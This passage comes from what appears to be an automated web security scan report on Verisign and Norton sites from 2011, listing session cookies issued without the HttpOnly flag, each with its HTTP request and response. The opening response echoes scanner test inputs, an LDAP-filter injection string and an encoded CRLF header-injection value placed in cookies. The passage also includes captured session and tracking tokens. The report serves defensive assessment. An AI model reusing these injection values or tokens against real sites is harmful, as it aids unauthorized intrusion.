environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: PROGRAM_TYPE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:31:2053e95%250d%250ad87014f842f; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: COUNTRY=US; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/ Set-Cookie: LANGUAGE=en; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/ Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/ Set-Cookie: PROGRAMID=; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/ Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/ Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:37:25; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/ Set-Cookie: TrafficSourceCookieName=other; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/ Set-Cookie: OriginalSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/ Set-Cookie: CurrentSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/ X-Powered-By: Servlet/2.5 JSP/2.1 Content-Length: 397 <html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="http://buy.norton.com/estore/mf/up...[SNIP]...
10.20. https://idprotect.verisign.com/toolbar/activate.v
Summary
Severity:
Low
Confidence:
Firm
Host:
https://idprotect.verisign.com
Path:
/toolbar/activate.v
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
JSESSIONID=4C45FEB27A5A8977451CA29A8776E476.moped1be-d1-tc; Path=/; Secure
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /toolbar/activate.v HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: idprotect.verisign.com Connection: Keep-Alive
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:48:59 GMT Set-Cookie: JSESSIONID=4C45FEB27A5A8977451CA29A8776E476.moped1be-d1-tc; Path=/; Secure Content-Type: text/html;charset=utf-8 Content-Length: 7564 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head>...[SNIP]...
10.21. http://m.verisign.com/
Summary
Severity:
Low
Confidence:
Firm
Host:
http://m.verisign.com
Path:
/
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
JSESSIONID=1695809E810A8CD4C2D73D9071CB7888.tomcat2; Path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: m.verisign.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; mbox=PC#1315621455064-973488.19#1378695614|check#true#1315623674|session#1315623613171-877153#1315625474; IS3_GSV=DPL-2_TES-1315621562_PCT-1315623642_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315623643.2; __utmb=136906671.1.10.1315623643; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315510044-5-99_0-1-__0_
Response
HTTP/1.1 302 Moved Temporarily Date: Fri, 09 Sep 2011 22:03:48 GMT Server: Apache Set-Cookie: JSESSIONID=1695809E810A8CD4C2D73D9071CB7888.tomcat2; Path=/ Location: http://m.verisign.com/home.v;jsessionid=1695809E810A8CD4C2D73D9071CB7888.tomcat2 Content-Length: 0 Content-Type: text/html
10.22. http://mbox3.offermatica.com/m2/verisign/mbox/standard
Summary
Severity:
Low
Confidence:
Firm
Host:
http://mbox3.offermatica.com
Path:
/m2/verisign/mbox/standard
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
mboxSession=1315621455064-973488; Domain=offermatica.com; Expires=Fri, 09-Sep-2011 21:56:52 GMT; Path=/m2/verisign
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /m2/verisign/mbox/standard?mboxHost=www.verisign.com&mboxSession=1315621455064-973488&mboxPC=1315621455064-973488.19&mboxPage=1315621580604-481541&mboxXDomain=enabled&mboxCount=1&protocol=http%3A&serverDomain=www.verisign.com&referrer=none&mbox=VRSN_TS_Main&mboxId=0&mboxURL=http%3A//www.verisign.com/trust-seal/index.html%3Ftid%3Dgnps&mboxReferrer=&mboxVersion=31 HTTP/1.1 Host: mbox3.offermatica.com Proxy-Connection: keep-alive Referer: http://www.verisign.com/trust-seal/index.html?tid=gnps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mboxPC=1315621455064-973488.19
Response
HTTP/1.1 302 Moved Temporarily Server: Test & Target P3P: CP="NOI DSP CURa OUR STP COM" Date: Fri, 09 Sep 2011 21:25:51 GMT Location: http://mbox3.offermatica.com/m2/verisign/mbox/standard?mboxHost=www.verisign.com&mboxSession=1315621455064-973488&mboxPC=1315621455064-973488.19&mboxPage=1315621580604-481541&mboxXDomain=enabled&mboxCount=1&protocol=http%3A&serverDomain=www.verisign.com&referrer=none&mbox=VRSN_TS_Main&mboxId=0&mboxURL=http%3A//www.verisign.com/trust-seal/index.html%3Ftid%3Dgnps&mboxReferrer=&mboxVersion=31&mboxXDomainCheck=true Set-Cookie: mboxSession=1315621455064-973488; Domain=offermatica.com; Expires=Fri, 09-Sep-2011 21:56:52 GMT; Path=/m2/verisign Content-Length: 0
10.23. https://onlinefamily.norton.com/familysafety/loginStart.fs
Summary
Severity:
Low
Confidence:
Firm
Host:
https://onlinefamily.norton.com
Path:
/familysafety/loginStart.fs
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:
JSESSIONID=C487A83A71391D525794280EAF628915; Path=/familysafety
formVersion=1315604755623; Path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /familysafety/loginStart.fs?inid=us_2010June_NOF HTTP/1.1 Host: onlinefamily.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:45:55 GMT Server: Apache Set-Cookie: user_pref_lang=eng; Expires=Thu, 08-Dec-2011 21:45:55 GMT; Path=/ Set-Cookie: formVersion=1315604755623; Path=/ Set-Cookie: JSESSIONID=C487A83A71391D525794280EAF628915; Path=/familysafety Cache-Control: no-cache,no-store,must-revalidate,max-stale=0 Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Type: text/html;charset=UTF-8 Connection: close Vary: Accept-Encoding Content-Length: 37906 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <...[SNIP]...
10.24. https://products.verisign.com/geocenter/reseller/doregister.do
Summary
Severity:
Low
Confidence:
Firm
Host:
https://products.verisign.com
Path:
/geocenter/reseller/doregister.do
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
JSESSIONID=BLTnTqJKyGPctfv1FdlqcJ70S5h6p0Gvlmy4hN8gznRX5SWKqb6t!1264420788; path=/; secure
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /geocenter/reseller/doregister.do HTTP/1.1 Host: products.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache="Set-Cookie" Connection: close Date: Fri, 09 Sep 2011 21:46:18 GMT Content-Type: text/html;charset=UTF-8 Set-Cookie: JSESSIONID=BLTnTqJKyGPctfv1FdlqcJ70S5h6p0Gvlmy4hN8gznRX5SWKqb6t!1264420788; path=/; secure X-Powered-By: Servlet/2.5 JSP/2.1 Content-Length: 8588 <html> <head> <title>Referring Partner Code Error</title> <link href="/geocenter/style.css" type=text/css rel="stylesheet"> <style type=...[SNIP]...
10.25. https://products.verisign.com/geocenter/reseller/logon.do
Summary
Severity:
Low
Confidence:
Firm
Host:
https://products.verisign.com
Path:
/geocenter/reseller/logon.do
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
JSESSIONID=JLFcTqJFrTLDMrnDfsKJpnM1TKGWGdMnR63n8jNnvndRhmkDzJCZ!1264420788; path=/; secure
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /geocenter/reseller/logon.do HTTP/1.1 Host: products.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache="Set-Cookie" Connection: close Date: Fri, 09 Sep 2011 21:46:13 GMT Content-Type: text/html;charset=UTF-8 Set-Cookie: JSESSIONID=JLFcTqJFrTLDMrnDfsKJpnM1TKGWGdMnR63n8jNnvndRhmkDzJCZ!1264420788; path=/; secure X-Powered-By: Servlet/2.5 JSP/2.1 Content-Length: 17095 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <link href="/geocenter/style_verisign.css" type=text/css rel="STYLES...[SNIP]...
10.26. https://products.verisign.com/geocenter/reseller/register.do
Summary
Severity:
Low
Confidence:
Firm
Host:
https://products.verisign.com
Path:
/geocenter/reseller/register.do
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
JSESSIONID=LFLdTqJKs7gRRpXLyKDGZh0GycTV9zGf0v1HCZvtSZfhRmTRGJC2!1264420788; path=/; secure
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /geocenter/reseller/register.do?vatCountry= HTTP/1.1 Host: products.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache="Set-Cookie" Connection: close Date: Fri, 09 Sep 2011 21:46:18 GMT Content-Type: text/html;charset=UTF-8 Set-Cookie: JSESSIONID=LFLdTqJKs7gRRpXLyKDGZh0GycTV9zGf0v1HCZvtSZfhRmTRGJC2!1264420788; path=/; secure X-Powered-By: Servlet/2.5 JSP/2.1 Content-Length: 8588 <html> <head> <title>Referring Partner Code Error</title> <link href="/geocenter/style.css" type=text/css rel="stylesheet"> <style type=...[SNIP]...
10.27. https://securitycenter.verisign.com/celp/enroll/outsideSearch
Summary
Severity:
Low
Confidence:
Firm
Host:
https://securitycenter.verisign.com
Path:
/celp/enroll/outsideSearch
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
JSESSIONID=OqJ57BcEDySGMZg17yokdHt03FquFgyYGEezg44I0uZ1diTyCIN7!-1800460983; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /celp/enroll/outsideSearch HTTP/1.1 Host: securitycenter.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Fri, 09 Sep 2011 21:46:33 GMT Content-length: 408 Content-type: text/html Last-Modified: Mon, 12 Jan 2004 23:04:38 GMT Set-Cookie: JSESSIONID=OqJ57BcEDySGMZg17yokdHt03FquFgyYGEezg44I0uZ1diTyCIN7!-1800460983; path=/ Accept-Ranges: bytes Connection: close <html> <head> <title>VeriSign Retail</title> <META HTTP-EQUIV="Pragma" CONTENT="no-cache"> <META HTTP-EQUIV="Expires" CONTENT="-1"> </head> <body bgcolor="#ffffff"> <h1>System Unavailable</h1>...[SNIP]...
10.28. https://securitycenter.verisign.com/celp/enroll/retail
Summary
Severity:
Low
Confidence:
Firm
Host:
https://securitycenter.verisign.com
Path:
/celp/enroll/retail
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
JSESSIONID=OqIZWIQD33u9AZA3Ap2HnemKDA9cEWwlrgBQZ31zh5e1fWNs3qL2!-1800460983; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /celp/enroll/retail;jsessionid=OqE0Tm00XOqZIfwiE7FczMWMMOkVjg1izXQLLDKjlcyrNzI8OY4a!-1800460983 HTTP/1.1 Host: securitycenter.verisign.com Connection: keep-alive Referer: http://www.verisign.com/code-signing/index.html?tid=a_box User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=OqE0Tm00XOqZIfwiE7FczMWMMOkVjg1izXQLLDKjlcyrNzI8OY4a!-1800460983
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Fri, 09 Sep 2011 21:43:53 GMT Content-length: 408 Content-type: text/html Last-Modified: Mon, 12 Jan 2004 23:04:38 GMT Set-Cookie: JSESSIONID=OqIZWIQD33u9AZA3Ap2HnemKDA9cEWwlrgBQZ31zh5e1fWNs3qL2!-1800460983; path=/ Accept-Ranges: bytes <html> <head> <title>VeriSign Retail</title> <META HTTP-EQUIV="Pragma" CONTENT="no-cache"> <META HTTP-EQUIV="Expires" CONTENT="-1"> </head> <body bgcolor="#ffffff"> <h1>System Unavailable</h1>...[SNIP]...
10.29. https://securitycenter.verisign.com/celp/enroll/upsell
Summary
Severity:
Low
Confidence:
Firm
Host:
https://securitycenter.verisign.com
Path:
/celp/enroll/upsell
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
JSESSIONID=OqE10CQDoczcE12dL3a6BYK7SmniMvBhWXtc1NQr68hhq3LGOaAg!-1800460983; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /celp/enroll/upsell?application_locale=VRSN_US&originator=VeriSign:CELP&bundle_id=MSIECS002 HTTP/1.1 Host: securitycenter.verisign.com Connection: keep-alive Referer: http://www.verisign.com/code-signing/index.html?tid=a_box User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 302 Moved Temporarily Server: Sun-ONE-Web-Server/6.1 Date: Fri, 09 Sep 2011 21:27:18 GMT Content-type: text/html;charset=UTF-8 Location: https://securitycenter.verisign.com/celp/enroll/retail Set-Cookie: JSESSIONID=OqE10CQDoczcE12dL3a6BYK7SmniMvBhWXtc1NQr68hhq3LGOaAg!-1800460983; path=/ Content-Length: 303 <html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://securitycenter.verisign.co...[SNIP]...
10.30. https://trust-center.verisign.com/process/retail/session_timeout
Summary
Severity:
Low
Confidence:
Firm
Host:
https://trust-center.verisign.com
Path:
/process/retail/session_timeout
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:
JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; Path=/; Secure
TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; Path=/; Domain=.verisign.com
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /process/retail/session_timeout HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: vtrh54nwcc; v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; mbox=session#1315621455064-973488#1315623602|PC#1315621455064-973488.19#1378693742|check#true#1315621802; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509977-4-99____; __fds_fp_id__=44590564957.1; TLTHID=03CA6F76DB2F10DB4BFEB1847A7DDBAF
Response
HTTP/1.1 302 Moved Temporarily Date: Fri, 09 Sep 2011 21:59:40 GMT Server: Apache Set-Cookie: TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Set-Cookie: JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; Path=/; Secure Location: http://www.verisign.com/ssl/buy-ssl-certificates/index.html Vary: Accept-Encoding Content-Length: 0 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html
10.31. http://us.norton.com/beta/index.jsp
Summary
Severity:
Low
Confidence:
Firm
Host:
http://us.norton.com
Path:
/beta/index.jsp
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
JSESSIONID=942CFE17E15760F8032358C3716740F0; Path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /beta/index.jsp?inid=us_hho_homepage_hero4_2012beta HTTP/1.1 Host: us.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=UTF-8 Expires: Fri, 09 Sep 2011 21:47:30 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 09 Sep 2011 21:47:30 GMT Content-Length: 24280 Connection: close Set-Cookie: JSESSIONID=942CFE17E15760F8032358C3716740F0; Path=/ <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Antivirus Free Software - Spyware Free Protection | Norton Beta Center</title> <meta http-equiv="Content-Type" cont...[SNIP]...
10.32. http://us.norton.com/beta/overview.jsp
Summary
Severity:
Low
Confidence:
Firm
Host:
http://us.norton.com
Path:
/beta/overview.jsp
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
JSESSIONID=FA523A7AE741FCDE2CC540690D11D77A; Path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /beta/overview.jsp HTTP/1.1 Host: us.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=UTF-8 Content-Length: 0 Expires: Fri, 09 Sep 2011 21:47:30 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 09 Sep 2011 21:47:30 GMT Connection: close Set-Cookie: JSESSIONID=FA523A7AE741FCDE2CC540690D11D77A; Path=/
10.33. http://vipmobile.verisign.com/fpa/fpa.jsp
Summary
Severity:
Low
Confidence:
Firm
Host:
http://vipmobile.verisign.com
Path:
/fpa/fpa.jsp
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
JSESSIONID=65DC06BE96553669FB720DFCD04F8421.tomcat2; Path=/fpa
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /fpa/fpa.jsp HTTP/1.1 Host: vipmobile.verisign.com Proxy-Connection: keep-alive Referer: http://vipmobile.verisign.com/home.v User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; mbox=PC#1315621455064-973488.19#1378695614|check#true#1315623674|session#1315623613171-877153#1315625474; IS3_GSV=DPL-2_TES-1315621562_PCT-1315623642_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315623643.2; __utmb=136906671.1.10.1315623643; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315510044-5-99_0-1-__0_; JSESSIONID=2D09D7FD63CC5CC2C8FC4F5A841ADA15.tomcat2
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 22:03:52 GMT Server: Apache Set-Cookie: JSESSIONID=65DC06BE96553669FB720DFCD04F8421.tomcat2; Path=/fpa Content-Type: text/javascript Content-Length: 108420 var urlProtocol = ('https:' == document.location.protocol ? 'https://' : 'http://'); // Customizable variables var hostUri = urlProtocol + "vipmobile.verisign.com/fpa"; var cookieDomain = '.v...[SNIP]...
10.34. http://vipmobile.verisign.com/images/b_shadow.png
Summary
Severity:
Low
Confidence:
Firm
Host:
http://vipmobile.verisign.com
Path:
/images/b_shadow.png
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
JSESSIONID=806370F1B7465CBED58C1BE853F86CDD.tomcat2; Path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/b_shadow.png HTTP/1.1 Host: vipmobile.verisign.com Proxy-Connection: keep-alive Referer: http://vipmobile.verisign.com/home.v User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; mbox=PC#1315621455064-973488.19#1378695614|check#true#1315623674|session#1315623613171-877153#1315625474; IS3_GSV=DPL-2_TES-1315621562_PCT-1315623642_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315623643.2; __utmb=136906671.1.10.1315623643; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315510044-5-99_0-1-__0_
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 22:03:58 GMT Server: Apache Set-Cookie: JSESSIONID=806370F1B7465CBED58C1BE853F86CDD.tomcat2; Path=/ Accept-Ranges: bytes ETag: W/"2822-1312807390000" Last-Modified: Mon, 08 Aug 2011 12:43:10 GMT Content-Length: 2822 Content-Type: image/png ...[SNIP]...
10.35. http://vipmobile.verisign.com/images/bl_shadow.png
Summary
Severity:
Low
Confidence:
Firm
Host:
http://vipmobile.verisign.com
Path:
/images/bl_shadow.png
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
JSESSIONID=4C16EF1CD603E479FE111492DDD71824.tomcat2; Path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/bl_shadow.png HTTP/1.1 Host: vipmobile.verisign.com Proxy-Connection: keep-alive Referer: http://vipmobile.verisign.com/home.v User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; mbox=PC#1315621455064-973488.19#1378695614|check#true#1315623674|session#1315623613171-877153#1315625474; IS3_GSV=DPL-2_TES-1315621562_PCT-1315623642_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315623643.2; __utmb=136906671.1.10.1315623643; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315510044-5-99_0-1-__0_
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 22:03:58 GMT Server: Apache Set-Cookie: JSESSIONID=4C16EF1CD603E479FE111492DDD71824.tomcat2; Path=/ Accept-Ranges: bytes ETag: W/"3072-1312807392000" Last-Modified: Mon, 08 Aug 2011 12:43:12 GMT Content-Length: 3072 Content-Type: image/png ...[SNIP]...
10.36. http://vipmobile.verisign.com/images/br_shadow.png
Summary
Severity:
Low
Confidence:
Firm
Host:
http://vipmobile.verisign.com
Path:
/images/br_shadow.png
Issue detail
